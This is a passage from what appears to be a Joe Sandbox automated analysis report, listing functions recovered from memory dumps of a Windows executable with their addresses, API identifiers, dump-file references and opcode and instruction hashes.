                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionRaise_clrfp
                                                                                • String ID:
                                                                                • API String ID: 15204871-0
                                                                                • Opcode ID: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                • Instruction ID: 72f9f5d22e67437b9c7ae5438b91971e00319e938c83594cfc6952a10e569897
                                                                                • Opcode Fuzzy Hash: 131550a8e914c8a4384a7255cc8ec53066b4dff0b7ecc1394be8dfb6b4310eca
                                                                                • Instruction Fuzzy Hash: 33B15877601B898AEB19CF29C84A3683BA0F744F4CF598921DA5D937A9CF3DD855C700
                                                                                Function 00007FF655948DF4 Relevance: 3.2, APIs: 2, Instructions: 186COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectRelease$CapsDevice
                                                                                • String ID:
                                                                                • API String ID: 1061551593-0
                                                                                • Opcode ID: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                • Instruction ID: a55452bb5dbeb61e0d7f4c4c74a909f54c1f35b9cde28cee0270980067a320b6
                                                                                • Opcode Fuzzy Hash: 68dbe16693602acb82a0a9c061fd0d735b77194d41f4ab9e90264308bb487059
                                                                                • Instruction Fuzzy Hash: 5181093AB18B45C6EB108F6AD4546AD3771BB84F88F044122DE4DA7B25DF3CD949C780
                                                                                Function 00007FF65594A2CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: FormatInfoLocaleNumber
                                                                                • String ID:
                                                                                • API String ID: 2169056816-0
                                                                                • Opcode ID: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                • Instruction ID: be8feb671d1ae02c355acc6bd41c5ab03ec0f96bdfe5ef6b6f8fba1b609f9d6a
                                                                                • Opcode Fuzzy Hash: a0c8fcaef59427837b2a7c7753e3d717a8442860a15e47712294eddcbb527c28
                                                                                • Instruction Fuzzy Hash: D9118C3AA18BC195E7618F21E4187EA7361FF88F88F884031DA4DA3656EF3CD949C744
                                                                                Function 00007FF65593126C Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00007FF6559324C0: CreateFileW.KERNELBASE ref: 00007FF65593259B
                                                                                  • Part of subcall function 00007FF6559324C0: GetLastError.KERNEL32 ref: 00007FF6559325AE
                                                                                  • Part of subcall function 00007FF6559324C0: CreateFileW.KERNEL32 ref: 00007FF65593260E
                                                                                  • Part of subcall function 00007FF6559324C0: GetLastError.KERNEL32 ref: 00007FF655932617
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6559315D0
                                                                                  • Part of subcall function 00007FF655933980: MoveFileW.KERNEL32 ref: 00007FF6559339BD
                                                                                  • Part of subcall function 00007FF655933980: MoveFileW.KERNEL32 ref: 00007FF655933A34
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: File$CreateErrorLastMove$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 34527147-0
                                                                                • Opcode ID: e551f5cd72cc32021c0545c09a5d852fa8adbb9b535e4bd48ae0dc113e77b3ec
                                                                                • Instruction ID: 71d2c99c87110c2d3b811c7b265fdd66733b9074559395e6f74700c58acbc5b2
                                                                                • Opcode Fuzzy Hash: e551f5cd72cc32021c0545c09a5d852fa8adbb9b535e4bd48ae0dc113e77b3ec
                                                                                • Instruction Fuzzy Hash: 8F91B32AB18686C2EE10DB66D4482AD6361FB54FC8F495032EE4DA7BA6DF3CD945C340
                                                                                Function 00007FF6559351A4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Version
                                                                                • String ID:
                                                                                • API String ID: 1889659487-0
                                                                                • Opcode ID: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                • Instruction ID: 5207ac2f02719a4a947fc2c7765e43c9b3811d5ff2a43a9e0b673e6d019cc541
                                                                                • Opcode Fuzzy Hash: 6220f8f0736b52f52a4f9f0684f7fcd1da0b773ba531a70ae5974f71c0de4052
                                                                                • Instruction Fuzzy Hash: 0C012D7AA18582C7F7248B00E84877A33A1FB98B19F580235D56DA2796DF3CF9048E00
                                                                                Function 00007FF655958C1C Relevance: 1.5, Strings: 1, Instructions: 219COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: 0
                                                                                • API String ID: 3215553584-4108050209
                                                                                • Opcode ID: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                • Instruction ID: 0caa815ef3898140707f7b8f3da95eaf3b17eb6b88e7ed62b0aabb790c517b72
                                                                                • Opcode Fuzzy Hash: 0fbd957179d89af9e1d3453d65279f22830f04fe064c784c04e338e6c7bf3646
                                                                                • Instruction Fuzzy Hash: F181D529A182C246FBA89A1580486FD22E0EF51F4EF7C1531DD49E7697CF2DEC66C740
                                                                                Function 00007FF6559589A0 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: 0
                                                                                • API String ID: 3215553584-4108050209
                                                                                • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                • Instruction ID: 768ccfb68ac5a472c998f39574e0fd04d9bda73f5f9d80e494488409019a1405
                                                                                • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                • Instruction Fuzzy Hash: 9971C36AA0C2C246FB688A2990482FD23949F41F4EF3C5935DD09F7697CF2DEC668741
                                                                                Function 00007FF65593C96C Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: gj
                                                                                • API String ID: 0-4203073231
                                                                                • Opcode ID: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                • Instruction ID: 908f9326704eb857fd870fed8d990342d81dd0ddf0491b77fcd7bd89bba678e0
                                                                                • Opcode Fuzzy Hash: 226aa63bfce789330e15763d8953fb7d553c3450d9c1aa6f260de1088bdface5
                                                                                • Instruction Fuzzy Hash: C95190377286908BD724CF25E404A9AB3A5F788798F455126EF8A93B09CB3DE945CF40
                                                                                Function 00007FF65595C838 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                • Instruction ID: 08ebc47c82da1a3978036ac114bdf127b90c3dfe1fd92ba5c5e7215f1ff20403
                                                                                • Opcode Fuzzy Hash: 49e7fa989fc271adaa8e130b28d1cae0d9f82f392019a5f874cdac11a507a941
                                                                                • Instruction Fuzzy Hash: 2941DF37715B8486EA04CF2AE4682A973A1AB98FC8B4D9036DE0DD7756EF3CD845C340
                                                                                Function 00007FF655960D20 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: HeapProcess
                                                                                • String ID:
                                                                                • API String ID: 54951025-0
                                                                                • Opcode ID: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                • Instruction ID: cbd854c4c38b39a897815c0aabf03f96b30553c43b19618b2ef105e8abee6c8c
                                                                                • Opcode Fuzzy Hash: 4ce929ddb23f73c0a8458b43b9ad49d4d7e2a2f746430c3d48bba7e89996d797
                                                                                • Instruction Fuzzy Hash: 97B09228E17B87C2EA082B116C8A29422E4BF48B04F9C8038C10CE1321DF2C28A94701
                                                                                Function 00007FF655943964 Relevance: .9, Instructions: 931COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f10b3c0000bd651423828cb986904098d4bd6c393877fd54d7a895255c38939a
                                                                                • Instruction ID: 9bc2119b1775fefd9fea3790b618ce6430186310f4e96d068f8ee4bab83717bd
                                                                                • Opcode Fuzzy Hash: f10b3c0000bd651423828cb986904098d4bd6c393877fd54d7a895255c38939a
                                                                                • Instruction Fuzzy Hash: 7482B1AAA096C186D715CE24D4482BC7BA1F755F8CF1D8136DAAE97386EF3C9C85C310
                                                                                Function 00007FF6559276C0 Relevance: .9, Instructions: 893COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                • Instruction ID: 3346f6346654b341ec80febf2a9caf754a7a22660b8cf0d0c81ac24d04a3b0fe
                                                                                • Opcode Fuzzy Hash: fb6bb4a62616f0bcd3e2e2126cd32946fe2ad160a7c0dbd4e5bd03ed1428d6a6
                                                                                • Instruction Fuzzy Hash: D8627D9AD3AF9A1EE303A53954131D2E35C0EF74C9551E31BFCE431E66EB92A6832314
                                                                                Function 00007FF6559453F0 Relevance: .9, Instructions: 891COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 48af5ed364a5f24a1952bf7eddbdda76aa6abd9a5dc0519f651bf09102684f27
                                                                                • Instruction ID: 905259e257549c4da9a90ce32ce9c3b66572cad59aa79100910b08800cb06762
                                                                                • Opcode Fuzzy Hash: 48af5ed364a5f24a1952bf7eddbdda76aa6abd9a5dc0519f651bf09102684f27
                                                                                • Instruction Fuzzy Hash: CF82E0BAA096C18AD725CE68D4486FC7BA1FB55F4CF088136CAA997786CF3C9C45C710
                                                                                Function 00007FF65593BB90 Relevance: .6, Instructions: 587COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                • Instruction ID: 38c7f2cf72c7f01a3c168281e9d816dd2c9eb99ee62ad41cf96b0d5586d298d6
                                                                                • Opcode Fuzzy Hash: ffdf8f5a64276e3eb417e3b9ae5b43350349d41efb04db03fca9f8ba9e24336f
                                                                                • Instruction Fuzzy Hash: 5C22E477B246908BD728CF15C89AA5E3766F798748B4B8228DF0ACB785DB3CD505CB40
                                                                                Function 00007FF655944B98 Relevance: .6, Instructions: 578COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                • Instruction ID: 78c2a877f8316aa04dc4e2577f6d8730c0d1b2720097ec7facd8433f0ee7280d
                                                                                • Opcode Fuzzy Hash: 21143e83615dcc23e36b64f0d60848ac948cba63854c17a605a1a3ec217f9251
                                                                                • Instruction Fuzzy Hash: 2832C1B6A041D18BE7188F24D558ABC37A1F754B4CF098139DA9A97B89EF3CEC64C740
                                                                                Function 00007FF655941F20 Relevance: .3, Instructions: 337COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c3190ea2af27d5756d92182682109c7c4eb2d5c381fcec9ad387f57713ef71fe
                                                                                • Instruction ID: a4cc1254bd3ae93cd155afb2ff7ba68765c29f293349124511719fbff30cd9fd
                                                                                • Opcode Fuzzy Hash: c3190ea2af27d5756d92182682109c7c4eb2d5c381fcec9ad387f57713ef71fe
                                                                                • Instruction Fuzzy Hash: B8E1C5AAA092C2CAEB64CF29A44826D7791FB44B4CF0D4135DB9DA7746EF3CED418704
                                                                                Function 00007FF655943484 Relevance: .3, Instructions: 302COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3d9f1d4af68ebc00f7ab7abf4cea58f5074969ee2768498b55c72978f68bcf28
                                                                                • Instruction ID: c15f872c22971bf2372cd4ba400b777921e1bc0b0440686a32d72c2999d3adf7
                                                                                • Opcode Fuzzy Hash: 3d9f1d4af68ebc00f7ab7abf4cea58f5074969ee2768498b55c72978f68bcf28
                                                                                • Instruction Fuzzy Hash: 1FB1D1A6B05BC992DE58CA75D50C6E9A391BB04FC8F488036DEAD67742DF3CE995C300
                                                                                Function 00007FF655927288 Relevance: .3, Instructions: 294COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
